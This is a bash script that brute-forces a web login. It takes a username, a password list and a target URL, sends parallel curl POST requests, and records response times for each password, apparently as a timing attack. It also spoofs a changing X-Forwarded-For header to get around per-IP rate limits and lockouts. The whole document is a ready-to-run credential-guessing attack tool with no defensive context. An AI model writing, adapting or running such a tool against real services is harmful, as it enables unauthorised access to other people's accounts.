#!/usr/bin/bash

username=$1
passwords_file=$2
url=$3
threads=10

login() {
	curl -s -X POST -o "$2_response" -d "username=$1&password=$2" -H "X-Forwarded-For: $3" $4 -w %{time_total} > $5
}

attempts() {
	tries=$3
	for i in $(seq 10 20); do
		login "$1" "$2" "$tries" "$4" "$2_tmptimes"
		cat "$2_tmptimes" >> $5
		rm $2_response $2_tmptimes
		echo "" >> $5
	done
}

execute() {
	attempts "$1" "$2" "$3" "$4" "$2_times"
}

running_jobs() {
	jobs -rp | wc -l
}

bypass=90

while read -r pass; do
	while [ "$(running_jobs)" -gt "$threads" ]; do
		sleep 0.1
	done
	bypass=$(( bypass + 12 ))
	execute "$username" "$pass" "$bypass" "$url" &
done < "$passwords_file"

wait
exit 0